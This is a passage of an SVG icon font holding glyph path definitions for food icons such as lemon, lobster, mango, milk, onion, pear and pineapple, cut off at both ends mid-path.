1 39 17 79 33 118 49 37 15 74 31 111 46 8 3 14 8 18 14 7 11 4 27 1 33-1 4-3 7-5 11-29 47-68 84-114 114z m-178-383c-3 7-5 15-15 16-9 0-12-9-15-16-32-77-64-153-95-230-10-23 0-43 25-50 28-7 57-10 86-10 28 0 57 3 84 10 25 6 35 27 26 50-32 77-64 153-96 230z m-307 211c75-32 151-63 227-94 8-4 17-9 24-1 7 7 2 15-2 23-20 49-40 98-61 148-11 26-22 53-33 79-3 8-7 14-13 18-9 8-25 6-32 4-4-2-8-3-11-6-48-30-86-69-117-116-14-22-7-45 18-55z m367-122c-7-3-16-5-16-15 0-10 8-12 16-15 76-32 152-64 229-95 23-10 43 0 50 25 7 27 10 56 10 97 0 16-3 45-10 73-6 25-26 35-50 25-77-31-153-63-229-95z m-155-32c5 2 10 3 14 6 11 6 11 16 0 22-6 4-12 6-18 8-73 31-146 61-220 91-23 10-44 0-49-25-3-14-5-28-7-42-3-23-6-42-5-42 1 0 1-20 4-45 2-15 4-29 8-44 4-15 16-25 30-26 8 0 17 3 24 6 73 30 146 60 219 91z m369-118c-28 11-57 23-85 35-48 20-95 39-143 59-6 3-13 6-20 0-6-6-2-13 0-20l1-3 50-120 45-110c4-7 8-13 14-17 9-7 24-6 29-4 4 2 7 3 10 5 50 30 91 71 121 122 4 6 6 14 5 22 0 17-12 25-27 31z" />
<glyph glyph-name="lemon" horiz-adv-x="1000" unicode="&#xeb76;" d="M770 458l-287-35c-9-1-12-8-5-14l189-189c7-7 17-6 23 1 54 65 87 142 95 222 1 10-6 16-15 15z m-342-91l-36-287c-1-9 6-16 15-15 80 8 158 42 222 95 7 6 8 17 1 23l-188 188c-7 7-13 5-14-4z m270 324l-204-204c-7-6-5-11 5-10l271 34c9 1 16 9 15 19-8 59-30 114-65 160-5 7-16 8-22 1z m-334-334l-205-205c-7-6-6-17 1-22 46-35 101-57 161-65 9-1 18 6 19 15l34 272c1 9-4 12-10 5z m425 426l-31-31c-6-6-7-17-1-25 59-73 88-166 82-266-6-114-56-224-141-309-90-90-211-142-332-142-91 0-176 29-243 83-7 6-18 5-25-1l-31-31c-6-6-6-17 1-23 95-81 215-125 342-125 141 0 273 54 373 154 100 100 155 232 155 373 0 127-45 247-126 342-6 7-16 7-23 1z" />
<glyph glyph-name="lobster" horiz-adv-x="1000" unicode="&#xeb77;" d="M713 335c-11-9-22-19-32-29-4-5-6-8-4-10 3-6 17 1 26 12 6 6 11 13 17 19 1 1 1 3 1 5 1 2-1 4-4 4-1 0-3 0-4-1z m-77-140c2-4 12 1 24 11 11 10 17 22 16 23-1 1-12-3-23-12-11-8-19-18-17-22z m18 86c-9-6-15-14-12-17s13-1 22 6 16 14 13 17c-3 2-14 0-23-6z m-352 358c24-7 46-19 68-30 5-3 10-6 15-9 7-5-8 2-33 15-26 14-49 21-50 20 0 0 0 0-1-1-9-20-7-41-5-63 0-2 4-4 6-5 24-9 50-12 76-9 8 0 15 3 20 10 1 2 3 5 6 7 4 4 18-8 31-27 14-19 29-33 34-31 4 2-5 19-21 39-16 20-24 36-19 37 3 1 6 1 9 2 6 2 12 4 18 7 48 25 90 58 111 111 4 10 7 21 9 32 2 7-3 9-9 6-7-4-15-8-21-13l-79-62c-23-17-45-34-68-50-3-2-7-4-10-5-6-3-11-4-12-3 0 1 3 6 7 12 3 3 5 7 8 10 34 35 72 65 115 88 24 12 47 25 69 39 3 1 4 3 6 5 3 3 0 8-5 9-5 2-10 4-12 4-1 0-2 0-3 0-15 1-30 4-44 3-44-4-85-18-122-43-33-22-58-51-78-85-5-7-8-11-18-9-13 3-26 3-39 3-21 0-40-6-56-21-2-2-5-5-7-7-3-4-6-8-5-9 0 0 20 20 51 27 19 4 39 2 58-4z m481-182c-7 12-17 19-30 23-15 4-30 7-45 9-8 1-15 2-23 3-13 2-22 4-20 4 1 0 2 0 3 0 22-1 44-2 65-3 6-1 10 0 11 7 6 33 7 65-1 97-12 54-34 103-79 139-5 4-11 8-17 11-8 4-11 1-10-7 1-5 2-10 4-15 13-40 32-78 37-120 3-25 5-50 7-76 0-2-1-4-1-7-1-3-3-6-4-6-1 0-4 7-7 16-1 6-3 12-4 17-11 50-22 99-33 148-2 7-4 13-6 20-3 11-7 19-8 19s-3-2-4-4c-1-1-1-2-2-3-14-25-19-52-20-80-1-27 0-54 5-80 8-44 13-73-10-73-23-1-41-8-39-12 1-5 19-3 39-1 12 1 25 0 37 0 7 0 8-3 9-9 1-6 1-15 6-19 18-17 38-31 62-39 13-4 14-3 23 8 5 7 9 15 12 23 5 14 29 15 44-9 15-25 22-45 22-43 1 2 1 4 1 6-1 21-13 39-24 56z m-310-158c-12 0-24 2-36 7-12 5-21 12-29 21-14 15-24 27-26 25-1-1-3-3-3-4-8-13-15-25-21-37-14-31-26-63-30-97 0-2 1-6 2-8 30-39 70-52 117-48 3 1 8 4 9 6 11 21 22 42 32 63 6 12 11 25 14 38 6 22-9 35-29 34z m49 172c-9-12-15-11-13 2 2 13 3 24 2 25-1 0-9-8-17-19s-14-16-14-11c1 3 1 6 1 8-1 9-1 19-3 27 0 2-2 4-4 6-3 2-7 1-10-2-2-2-3-4-5-6-1-3-1-8 0-12 0-7 2-13 3-19 0-3-1-7-3-8-27-17-44-44-63-69-5-7-6-16-3-25 14-53 71-64 105-53 10 4 17 10 21 20 5 18 9 36 11 54 2 30 2 60 10 71 8 12-10 24-18 11z m-189-465c-3 1-7-3-9-6-3-4-6-8-9-13-4-7-8-13-9-13-1 0 1 7 3 16 1 5 2 10 3 16 1 4-2 9-5 12-2 2-9 1-12-1-18-15-36-30-54-46-2-1-3-3-5-5-3-4-5-7-4-8 0 0 0-1 0-1 2-2 4-3 6-5 30-24 66-37 105-39 8-1 12 2 11 10-4 25-8 51-13 76 0 3-5 7-8 7z m309 342c25 9 43 25 58 47 1 2 0 7-2 8-9 6-19 12-29 18-16 9-36 6-49-4s-20-21-11-35c6-9 11-18 16-27 4-6 10-9 17-7z m-261-187c-35 15-57 33-58 25-1-6-2-11-3-15-1-10 3-18 9-24 25-26 55-35 90-32 2 0 5 1 7 2 5 5 9 10 13 15 6 10-23 14-58 29z m-96-137c2 1 2 5 2 7-1 3-2 6-3 9-2 5-18 6-34 4-11-2-21-3-31-4-11-1-14-6-15-16-1-11-1-22 3-32 6-17 32-13 48 3 10 9 20 19 30 29z m76 498c3 15-3 22-23 24-21 1-44-9-42-30 3-22 25-33 41-29 17 5 21 20 24 35z m1-516c-6-3-8-23-5-45 1-13 3-26 5-39 0-6 3-7 8-7 20 1 34 12 44 28 1 2 1 5 0 7-5 11-11 22-18 32-12 18-28 28-34 24z m43 77c3 4 6 8 8 12 5 7-19 8-50 20-31 11-48 30-49 24-1-4-2-7-3-11-1-6 0-11 5-16 23-19 49-30 79-32 3 0 8 1 10 3z m-12-20c4 6-17 9-43 20-27 10-45 23-46 16 0-4-1-7-1-11 0-4 1-9 4-12 17-22 40-31 68-29 4 1 9 3 11 6 3 3 5 7 7 10z m-92-20c2-10 6-18 12-24 8-8 17-11 28-9 15 4 26 14 35 26 1 1 1 1 1 2 0 1-20-2-42 7-22 8-38 12-34-2z m299 160c-11 1-21 3-31 4-7 1-11 1-13-2-4-6 2-14 7-16 3-1 6-2 9-2 15-1 30-3 44-3 4 0 8 1 10 3 4 5-10 13-26 16z m-384 143c0-3 2-6 3-9 7-9 16-16 26-22 15-10 32-12 35-6 2 3 2 6-3 9-9 6-19 12-28 18-16 10-32 15-33 10z m134-35c1 2 1 3 2 4 5 7 3 12-4 16-9 6-17 13-26 19-3 2-5 4-8 6-4 3-10 1-13-5-3-6 7-18 21-27 14-9 27-15 28-13z m196-50c-8 1-16 1-24 2-15 1-15 1-18-13 0 0 0-1 1-2 0-1 13-4 29-6 17-2 31 1 33 7 2 6-2 11-9 12-4 0-8 0-12 0z m-22-38c-13 6-25 9-27 5-1-2-2-4-3-6-3-4-1-8 3-10 8-5 16-8 25-11 15-5 27-3 28 2 0 4 0 7-2 7-8 5-16 9-24 13z m-188 59c2 2 3 4 4 7 2 4-9 10-23 14-9 3-17 5-26 7-2 0-6-5-8-9-1-1 0-5 1-6 15-6 30-12 45-17 2-1 6 1 7 4z m-38 81c0 5-2 9-8 15-4 6-9 11-13 16-8 9-20 12-22 5-1-4 0-8 4-13 4-6 9-13 14-19 9-10 24-13 25-4z m298-101c-18-3-18-3-22-21 0 0 0 0 0-1 1-1 10 0 21 2 7 1 13 2 20 3 7 2 14 6 19 12 5 5 2 10-6 10-11-1-21-3-32-5z m-224 92c4 4 1 15-8 24-5 5-10 11-16 16-1 1-3 1-5 2-3 0-6-2-6-5 0-2 0-4 0-5 5-7 9-13 14-20 7-10 17-15 21-12z m194-47c-2 1-3 2-5 2-8 0-15-1-22-2-13-1-22-7-21-12s11-8 23-6c7 2 15 4 22 6 2 0 3 2 4 4 2 2 2 6-1 8z m-319 209c-2 2-4 4-4 4-1-1-3-2-4-4 0-2-1-3-1-4 0-17 0-33 1-49 0-2 4-5 6-4 3 0 7 3 8 5 3 16 2 32-4 48-1 1-2 3-2 4z m86-67c-4 3-11-10-10-26 1-15 9-25 13-24 4 2 6 6 5 10 0 3-1 5-1 8-2 8-2 16-4 24 0 3-1 6-3 8z m253-126c-8-6-13-15-11-20 2-4 13 2 24 12 10 10 16 24 11 25-3 0-6-1-9-4-5-4-10-8-15-13z m-373 33c4 2 6 13 4 23-1 7-3 13-4 20 0 1-1 3-3 4-2 3-4 2-6 0-1-2-1-3-1-5 0-8 1-15 1-23 2-13 6-21 9-19z m31 96c-4 0-6-7-4-14 1-5 1-9 3-13 2-8 3-11 6-13 7-4 11 11 8 21-3 11-9 19-13 19z m292 52c6 8-3 15-9 7-6-8 3-14 9-7z m-36 32c-1 0-2-8-2-17-1-10 4-16 7-11 2 3 3 6 3 10 0 3 0 6-1 10-1 5-6 8-7 8z m56 13c-1-1 0-2 0-4 1-2 5-2 9 0s8 5 7 7c-1 2-1 4-2 4-4 3-13-1-14-7z m-58 33c-1 0-4-4-4-10 0-4 2-8 5-9 2 0 5 1 6 3 3 6 0 13-7 16 0 0 0 0 0 0z m88-23c2 1 4 2 5 5 1 2-1 6-3 6-3 1-6 1-7-1-3-3 0-10 5-10z m-97 37c2-5 12 0 10 5-2 5-13 0-10-5z" />
<glyph glyph-name="mango" horiz-adv-x="1000" unicode="&#xeb78;" d="M687 542c-59 55-130 80-215 68-49-7-93-22-130-52-50-40-75-93-86-153-28-164 71-369 214-460 29-19 61-34 98-32 35 1 72 30 67 68 0 7 0 13 0 23-3 38 9 74 28 110 38 74 51 125 79 232 16 78 3 142-55 196z m-195 88c3 1 7 6 7 9-5 53-23 99-75 127-34 19-72 23-110 21-16-1-32-4-49-6 13-47 29-89 64-122 44-41 107-48 163-29z m47-2c66-4 111 30 123 92 2 15 3 31 4 49-38-3-71-9-99-30-36-26-45-63-39-104 0-3 7-6 11-7z" />
<glyph glyph-name="milk" horiz-adv-x="1000" unicode="&#xeb79;" d="M272-72c120-5 238-10 357-15v686h-357v-671z m233 397h16l-1-37h1l4 11 11 26h17l-18-36 17-46h-17l-11 34-4-6 0-27h-16l1 81z m-46 1l16-1-1-68 21 0 0-13-37 0 1 82z m-30 0l16 0-1-81h-16l1 81z m-74 1h17l6-30c2-10 4-19 5-28h0c2 9 4 18 6 28l7 29 16 0 4-81h-14l-1 28c0 8 0 19 0 27h0c-2-8-4-18-6-25l-7-29-12 1-6 28c-1 7-4 17-5 26h0c0-9-1-19-2-27l-1-29-14 1 7 81z m375 252c-1 2-3 5-4 5-29 5-57 10-86 15v-683c28 17 54 34 81 50 7 4 10 8 10 17-1 196-1 392-1 589 0 2 1 5 0 7z m-53 133h-164c-8-7-13-15-20-19-23-15-48-19-75-15-24 4-28 15-13 35-26 0-51 0-75-1-3 0-6-3-7-6-16-28-32-56-47-84-2-4-4-7-7-12 3 0 5-1 7-1 116 0 232 0 348 0 6 0 9 3 11 8 13 29 26 59 39 88 1 2 2 5 3 7z m-153-59c-13-8-27-16-42-21-23-8-48-11-72-4-14 4-18 9-18 24v31c36-25 105-7 122 23 5-13 12-24 15-37 2-4-2-13-5-16z m-107 70c5 0 11 1 17 2 21 6 42 9 63 1 5-2 10-3 16-3 53-1 107-1 161-1h9c1 2 2 3 2 3l0 38c0 21-3 25-24 25h-307c-3 0-7 0-11-1-8-1-13-6-13-13-1-17 0-34 0-51 4 0 7 0 11 0 25-1 50-1 76 0z m225-115c29-5 58-10 89-15-15 39-29 78-44 118-15-34-30-66-44-99-1-1-1-2-1-4z" />
<glyph glyph-name="mushroom" horiz-adv-x="1000" unicode="&#xeb7a;" d="M933 303c-6 32-21 60-42 84-15 18-34 33-57 44-27 12-54 24-84 25-12 1-25 0-38 0 16 37 12 70-10 100 0-8 2-16 2-25 0-23 0-47-15-66-4-5-10-9-16-11-14-6-27-10-41-15-6-2-11-5-16-8-7 29-13 56-19 84 28-10 53-9 77 4-30 4-59 8-86 25 21-1 39 9 41 22-1 0-2 0-2 0-32-9-63-10-95-2-19 6-38 8-58 4-7-1-14-1-19 1-12 4-23 9-34 14-11 5-21 10-31 16 10-22 28-34 51-41-4-3-6-5-7-6 22 1 45 3 67 2 25-1 46-11 57-34 14-31 14-64 13-98-3 1-6 1-9 1-22 3-44 4-67-1-10-2-20-5-28-15 43 1 87-9 97-19-7-15-15-30-22-45-2-4-4-7-9-7-24 0-48-2-72 0-21 1-42 5-60 19-11 10-13 19-4 31 7 8 15 14 23 20 9 6 19 11 28 17 0 1 0 2 0 3-16-2-31-3-45-5 24 28 42 84 32 101-2-3-3-6-5-8-8-17-17-35-26-51-14-24-28-47-42-71-7-10-9-21-3-32 1-2 2-3 3-5-15 0-31-4-47-12 14-5 18-14 17-26 10 3 18 7 26 9 28 5 51-4 70-26 5-7 11-14 16-21 5-10 9-20 15-32 2 28-5 53-21 73 33-4 66 0 99 10 0-12-1-24 0-35 1-12 0-24 7-35 11 6 11 6 11 17 1 12 5 22 10 31 15-16 30-32 44-48-18 6-37 4-53-3-27-11-48-29-58-59-8-25-5-49 7-73 0 2 0 4 0 5-2 29 1 56 20 79 11 12 23 16 36 9 6-3 10-7 16-11 0 1 0 2 0 3-9 16 12 44 32 50h0v0c23 8 46 17 72 13 7-1 14-4 21-7 18-8 27-23 34-40 10-22 15-45 11-70-5-20-16-37-30-51-10-11-8-22-6-37 21 16 36 35 52 54 15-20 40-31 55-25-25 16-47 51-41 68 3-2 6-4 9-6 14-8 29-15 43-22 6-3 13-2 15 6-28 15-57 29-69 63 27 0 44 7 53 20-19-5-37-2-55 3-2 1-5 2-6 4-7 16-20 28-33 40-8 7-16 14-26 18-7 3-12 8-15 15-2 5-4 12-6 18-3 10-5 21-7 33-10-19-13-36-8-57-30 10-37 39-55 59-6-25 6-44 17-62-16-9-27-6-35 9-4 8-8 16-10 24-2 7-9 15-2 22 11 12 20 25 33 34 18 14 40 22 63 25 27 4 55 8 82 9 32 1 60-14 84-33 20-16 36-36 47-59 22-42 31-87 28-134-1-12-2-25-4-38 5 12 8 24 10 35 9 37 10 74 3 112z m-586 169c12-5 25-6 39-3-10 8-20 14-28 22-9 8-15 18-22 28-14 21-12 48 5 68 12 13 26 23 42 28 23 7 48 12 72 16 50 9 98 2 146-13 34-12 65-30 85-62 1-2 2-4 5-7-1 6-1 9-1 13-5 21-18 37-35 47-19 13-40 22-62 30-37 14-76 18-115 22-11 1-22 1-34 2 28 20 59 31 91 34 38 3 75-3 106-27 4-3 8-7 12-11-1 5-3 9-6 13-14 17-33 28-53 36-36 13-74 12-111 6-35-6-67-20-98-37-28-16-54-35-79-56-26-21-34-56-23-83 12-30 34-52 64-66z m-52-446c7 4 14 7 20 12 23 19 46 39 69 59 20 17 36 39 51 61 11 16 15 34 19 52 2 13-3 30-10 38 1-19-2-37-10-55-14-31-36-56-60-80-22-22-49-38-77-51-30-14-59-27-92-30-17-1-35-2-50 8-23 15-33 36-29 64 0 4 1 9 2 13 4 1 8 2 12 3-4 2-7 5-9 7 3 11 8 22 14 33-18-5-29-16-37-29-2 0-13-26-12-25-6-16-7-32-6-48 2-32 22-59 53-67 30-9 62-10 93-9 55 0 108 11 156 38 33 19 59 45 74 80 5 11 8 23 6 37-26-86-119-119-177-111z m507 335c-22 15-44 28-70 33-23 4-45 4-70-3 4-1 6-2 9-2 32-5 62-17 89-34 19-12 35-29 52-45 16-15 27-35 35-56 12-32 17-66 16-101-1-26-10-50-28-69-6-6-12-13-19-17-8-5-17-8-26-13-2-1-4-3-6-5 23-5 62 8 77 23 26 25 38 56 40 91 3 52-13 99-43 141-16 22-33 42-56 57z m-546-29c-3-9-6-19-12-26-15-14-31-27-46-41-5-4-12-6-17-9l0-3c9 1 17 2 25 3 29 5 49 23 70 41 2-2 3-3 4-4 11-22 23-44 32-67 7-18 8-39-5-55-13-18-29-33-51-41-10-4-21-9-31-13l0-2c3-1 7-1 12-2-18-17-26-37-24-63 9 15 16 28 24 40 10 15 22 28 40 35 11 4 21 12 30 19 6 5 10 12 16 17 20 15 40 32 65 38 5 1 9 3 14 5-17 13-32 7-49-3 16 28 38 47 60 67-27-4-51-13-67-38 0 2-1 3-1 4-7 27-16 54-29 80-6 14-16 23-27 32-13 13-30 13-47 11 10-6 16-14 14-25z m368-119c-5 3-10 5-15 8 17-18 32-36 47-55 12-13 16-30 17-47 1-7-1-14-3-21-4-16-16-26-30-35-16-10-31-11-47-7-23 5-42 16-58 34-4 5-10 9-15 13 9-31 26-56 54-72 16-10 33-17 53-14 46 5 79 51 70 96-10 45-36 76-73 100z m-423-66c4-2 8-5 13-8-2 7-5 14-9 19-20 25-46 42-78 53 19 3 36 10 48 21-1 0-1 0-1 0l-3 0c-21-1-41-4-61 4-16 7-21 18-12 33 6 11 15 22 24 31 10 10 22 19 34 26 18 12 38 21 58 32-7-1-13 0-18-1-35-9-66-25-93-48-16-14-29-30-37-50-7-15-4-30 9-41 8-6 17-11 26-16 33-19 67-37 100-55z m165 377c4-6 7-15 12-17 19-6 43 15 41 32-16-9-32-15-50-13-1 0-3-2-3-2z" />
<glyph glyph-name="noodles" horiz-adv-x="1000" unicode="&#xeb7b;" d="M715 208h-644c-5 0-9-4-8-9 0-5 1-10 2-15 1-5 6-9 11-9h634c5 0 10 4 11 9 1 5 2 10 3 15 0 5-4 9-9 9z m-10-54h-624c-5 0-8-4-7-9 14-47 38-89 69-124 4-4 11-7 16-7h468c5 0 13 3 16 7 31 35 55 77 69 124 2 5-1 9-7 9z m-99-161h-426c-5 0-6-3-2-6 9-8 19-15 29-22 5-3 12-5 18-5h337c5 0 13 2 18 5 10 7 19 14 28 22 4 3 3 6-2 6z m-261 498c3-25 4-50 1-75-3-28-5-56 1-84 6-31 4-62-3-92h-33c1 7 1 14 1 21 1 25 2 50 2 75 0 29 0 58 1 87 0 18 4 38 0 55-10 48 2 94 2 142h33c0-15 0-29-2-43-5-29-6-57-3-86z m151-252c-10 0-18 1-26 0-7 0-11 3-11 10 0 29-3 58 0 87 2 29 3 57-1 86-3 20-4 41-1 61 5 31 6 62 0 93-2 12-2 24-1 36 0 3 4 8 6 9 8 1 16 0 24 0 1-13 1-25 3-35 4-33 8-66 3-99-4-23-5-46-2-69 4-29 5-58 1-88-3-21-1-42 0-63 0-9 3-17 5-28z m-104 155c-1-13-1-25 0-37 1-26 4-52 5-78 0-13-3-26-5-40h-34c0 7 0 13 1 18 7 28 5 55 3 84-3 26 0 53 0 80 1 21 1 42 1 62-1 22-4 44-4 66 0 22 3 43 6 64 0 2 4 7 6 7 8 1 16 0 25 0 3-52-10-102-1-153 5-23-2-49-3-73z m-129-131c1 24 1 48 1 71 0 20-5 40-1 58 6 34 4 66-2 99-2 9-2 19-1 28 6 33 12 66 1 101h31c1-15 2-28 2-41 1-32 1-64 1-96 1-21 0-42 0-63 0-31 0-63 0-94 1-22 2-45 2-67 0-6 0-13 0-19h-37c1 9 3 16 3 23z m271 151c0-24 4-49 1-73-4-30-6-59 2-89 1-4 1-7 1-12h-26c-8 36-9 71-3 107 3 14 3 30 2 44-3 33-10 66-3 99 6 30 4 58-1 87-3 14-2 28-2 43h24c2-19 2-37 6-54 4-26 3-51 0-77-2-25-1-50-1-75z m-89-174h-27c-7 32-10 63-4 95 6 28 4 55 0 83-2 24-2 48 1 71 4 30 3 60-2 90-2 13-1 27-1 41h24c1-14 1-26 3-38 4-31 7-61 3-93-4-24-5-49-2-73 4-29 6-57 0-86-5-23-4-47 2-71 1-6 2-12 3-19z m-372 373v-17c0-5 3-9 8-9l137-2v37h-137c-5 0-8-4-8-9z m856 9h-361v-43l361-6c5 0 8 4 8 9v31c0 5-3 9-8 9z m-847 29l848 40c4 0 8 4 8 9l-2 31c0 5-4 9-9 9l-847-53c-4-1-8-5-8-10l1-17c1-5 4-9 9-9z" />
<glyph glyph-name="onion" horiz-adv-x="1000" unicode="&#xeb7c;" d="M677 456c-92 19-126 70-135 143-5 41-7 94-10 140 0 16-15 30-33 31-17 1-33-11-34-27-1-21-2-44-4-59-5-45-7-90-16-135-9-45-40-74-94-85-79-16-151-47-208-99-140-127-90-322 93-389 18-6 23 1 12 15-102 137-77 321 57 403 15 10 25 10 20 3-4-5-7-9-10-13-54-69-81-146-77-230 0-2 1-5 2-8 3-23 7-46 15-68 8-20 19-40 33-58 14-17 31-33 49-46 16-10 122-67 138-34 5 11 23 99 25 118 7 50 11 111 11 161 0 8-1 20-3 30 0 3-1 7 4 6 2-1 3-4 4-6 13-45 22-92 24-138 2-19 2-39 3-59 1-25 3-51 4-77l2-22c0-12 15-20 33-15 128 34 204 154 176 286-2 11-5 21-7 32l-3 13c-2 7 5 1 13-14 46-84 44-168 3-254-8-15 0-24 18-18 127 47 192 190 134 305-47 92-133 146-239 168z" />
<glyph glyph-name="orange" horiz-adv-x="1000" unicode="&#xeb7d;" d="M333 573c46-31 102-34 149-14 0 51-26 101-72 131-46 31-102 34-149 14 1-51 26-101 72-131z m279-6c30 19 46 51 47 84-31 13-67 11-97-8-29-20-46-52-46-85 30-13 66-11 96 9z m-92-32v1c0 6-9 11-20 11-11 0-21-5-21-11v-1c-162-10-290-146-290-311 0-172 139-312 311-312s312 140 312 312c0 165-129 301-292 311z m46-522c-5 0-9 4-9 10 0 5 4 10 9 10 6 0 10-5 10-10 0-6-4-10-10-10z m54 22c-12 0-21 10-21 21s9 21 21 21 21-9 21-21c0-11-10-21-21-21z m30-46c-7 0-14 7-14 14 0 8 7 14 14 14 8 0 14-6 14-14 0-7-6-14-14-14z m-147 573c1 0 2 6 1 12l-20 201c-1 7-7 13-14 13h-49v-8l75-206c2-7 5-12 7-12z" />
<glyph glyph-name="pear" horiz-adv-x="1000" unicode="&#xeb7e;" d="M477 639c18 67 65 108 119 104v-43c-4-1-9-2-13-3-32-5-59-35-60-65 0-6 1-9 8-11 62-12 104-64 106-127 1-42 13-81 28-119 18-48 38-96 55-145 13-36 20-74 16-114-6-55-30-102-71-139-89-81-221-87-316-12-59 47-89 109-86 185 2 37 13 73 26 108 20 52 41 104 60 157 10 27 14 56 15 85 2 55 40 103 95 119 4 1 7 2 13 3-46 4-88 13-120 46-31 34-39 76-41 119 99 2 157-46 166-148z" />
<glyph glyph-name="peas" horiz-adv-x="1000" unicode="&#xeb7f;" d="M213 602c-19-11-34-30-42-51 27-38 61-78 100-118-1 51 33 96 81 110-49 25-96 45-139 59z m262-141c-1 4-2 9-4 13-33 21-67 41-99 59h0l-1 0-6-1c-2-1-5-1-7-2-46-11-78-56-72-105v0c0-2 0-4 1-7 0 0 0 0 0-1 1-1 3-3 4-4 25-25 51-49 79-72 7-1 14-1 22-1l-1 1c-6 56 31 107 84 120z m-70-118c1-3 1-5 1-7 1-2 1-5 2-7 3-11 8-21 14-31 16-12 32-24 49-36 13-4 27-6 41-4 0 51 36 96 85 107 0 7-2 14-4 20-29 23-58 45-88 66-4 0-9 0-14-1l-1 0c-2 0-4-1-5-1-3 0-5-1-7-1-47-12-78-56-73-105 0 0 0 0 0 0z m121-96v0c1-10 4-19 7-27 33-20 66-40 100-57 0 51 36 95 85 107l0 1c-28 29-57 57-88 84-6 0-12 0-18-1h-1c-2 0-4 0-6-1-3 0-5-1-7-1-42-11-71-49-72-91 0-3 0-5 0-7 0-3 0-5 0-7z m121-92c2-1 5-2 7-3 51-25 103-46 155-61 11 10 20 24 25 38-29 44-64 87-101 127-1 1-2 1-2 2l-5-1-7-1c-41-11-71-48-72-91 0-3 0-5 0-7l0-3z m-530 483c29-3 60-10 95-21 3-1 6-2 9-3 4-1 7-2 10-4 38-13 77-30 119-50 3-2 6-4 9-5l9-5c2-1 5-2 7-3 4-3 8-5 12-7 6-3 12-6 18-10 16-9 32-18 48-29 6-3 11-6 17-10 4-2 8-5 12-8 9-6 19-12 28-19 5-3 9-6 13-9 7-4 13-9 20-14 10-7 20-15 30-22 6-5 13-10 19-15l12-9c11-9 22-18 32-28 4-2 7-5 10-8 5-4 9-8 13-12 17-15 34-31 50-47 5-4 9-8 13-12 3-3 6-7 9-10 2-2 4-4 6-6 2-2 4-4 6-6 2-3 4-5 6-7 33-36 63-74 90-112l6-8c1-3 3-5 5-8 12-19 24-39 35-58 3-1 6-2 10-2 18-3 31-7 40-12-11 202-269 691-818 627-2 0-4-1-7-1-14-2-25-5-32-9 13-1 27-14 39-38z m819-595c-5 5-20 10-43 14 0 0 0 0-1 0-2 1-5 1-8 2-2 0-5 1-8 2-21 4-42 9-64 15l-8 2-8 3c-49 15-98 35-146 59-3 1-5 2-8 3-3 2-5 3-8 4 0 1-1 1-1 1-5 2-9 4-13 7-5 2-10 5-16 8-18 10-36 21-54 31l-16 10c-3 2-7 5-11 7-20 13-39 26-57 39-19 13-36 26-54 40-16 12-32 25-47 38-3 3-7 6-11 9l-15 13c-13 12-27 24-40 36-4 5-9 9-14 14-3 3-6 6-9 9-1 1-1 1-1 1l-6 6c-2 2-4 4-6 6-37 38-69 75-96 111l-6 8-5 7c-19 27-35 53-47 77 0 1-1 2-1 2-1 2-2 4-3 6-1 2-3 5-4 7-10 16-19 23-26 23-4-1-7-3-9-8-1-2-1-5-2-8-1-2-1-5-1-8-1-7 0-16 1-26 75-522 571-627 792-601 15 1 28 4 40 6l2 1c3 1 5 1 7 2 3 0 5 1 7 2 12 3 20 7 23 11 3 3 3 6 1 9z" />
<glyph glyph-name="pepper" horiz-adv-x="1000" unicode="&#xeb80;" d="M936 150c-3 8-11 8-19 8-65 0-128 7-192 18-94 17-185 43-269 91-78 43-141 100-178 183-19 39-54 56-94 44-14-4-26-11-40-17-18 34-30 69-32 108-3 39 8 74 42 103-17 5-31 8-45 12-6 2-9 1-13-4-20-25-30-54-32-86-3-55 11-105 32-155 3-6 2-9-2-14-29-41-38-86-26-135 9-40 32-74 57-107 61-79 140-134 234-166 85-30 172-40 262-32 76 5 149 23 217 57 35 17 67 39 93 69 5 7 9 14 5 23z m-210-96c-10-3-23-5-36-7-26-4-53-6-79-7-32-2-62-2-90 0-4 0-8 0-11 0-6 1-3 4 8 9 11 4 26 8 34 9 9 1 33 1 53-1 17-1 34-1 52-1 22-1 44-1 66 0 3 0 6 0 7 0 0-1-1-2-4-2z" />
<glyph glyph-name="pie-alt" horiz-adv-x="1000" unicode="&#xeb81;" d="M454 660v-319c0-20 16-37 36-37l320 0c20 0 36-16 34-36-18-199-186-356-390-356-216 0-391 176-391 392 0 216 174 391 389 392h1c0 0 1-16 1-36z m483-258c2-20-14-37-34-37l-350 0c-20 0-36 16-36 36 0 102-1 386 0 386 221 0 402-170 420-385z" />
<glyph glyph-name="pie" horiz-adv-x="1000" unicode="&#xeb82;" d="M922 323c-29 10-42 35-56 65-32 74-89 127-165 165-7 4-14 0-13-9 1-12 2-22-2-31-2-7-7-13-12-19-9-9-23-10-33-1-7 6-13 13-14 20-5 18-3 36-2 56 0 9-7 17-15 19-21 4-42 7-64 11-8 2-15-4-15-13 1-17 2-32-1-46-2-6-7-12-13-17-8-8-23-8-32 0-7 5-12 11-14 18-5 13-3 28-2 46 0 9-7 14-15 13-23-5-44-9-65-13-8-2-15-10-15-19 1-23 2-43-2-63-2-11-19-24-30-26-8-1-23 15-27 26-4 11-4 24-4 38 0 9-7 13-14 9-74-38-131-90-163-164-14-30-27-55-56-65-9-3-16-11-16-20v-8c0-8 6-20 14-23 26-12 53-5 77 10 29 18 55 18 84 1 40-25 82-24 122 0 28 17 52 17 80 0 40-24 82-24 122 0 28 16 52 18 80 1 41-25 84-25 126 0 26 16 50 16 76 0 26-15 53-25 81-12 8 4 13 15 13 23v8c1 9-6 17-15 20z m-158-72c-41-23-88-20-130 4-22 12-39 15-62 2-47-28-95-24-145-2-16 8-41 7-57 0-45-21-92-28-135-3-31 18-55 15-79-1-7-5-10-16-7-24 14-37 27-75 41-112 3-8 12-15 21-15h578c9 0 18 7 21 15 14 37 27 75 41 112 3 8 0 20-7 25-25 16-49 17-80-1z" />
<glyph glyph-name="pineapple" horiz-adv-x="1000" unicode="&#xeb83;" d="M393 37c-15-16-31-33-47-51 8-4 18-6 25-13 7-8 9-19 13-28 17 18 33 35 48 51-13 14-27 29-39 41z m174-41c15-17 31-33 48-52 5 23 21 36 40 43-17 18-33 35-48 51-13-14-27-28-40-42z m-222 354c17-18 33-35 47-50 13 14 27 29 41 44-15 16-30 32-48 51-6-24-21-38-40-45z m270 43c-17-18-32-35-48-51 14-14 27-29 41-43 15 16 31 33 47 51-19 8-36 19-40 43z m-156-51c14-15 28-29 41-43l41 44c-13 14-27 29-40 42-14-14-28-29-42-43z m189-232c-14 15-27 30-41 44-13-14-27-28-40-43 14-14 28-29 41-43 13 14 27 29 40 42z m-148-72c-13-14-27-29-39-42 13-15 27-30 40-44 13 14 27 29 40 43-14 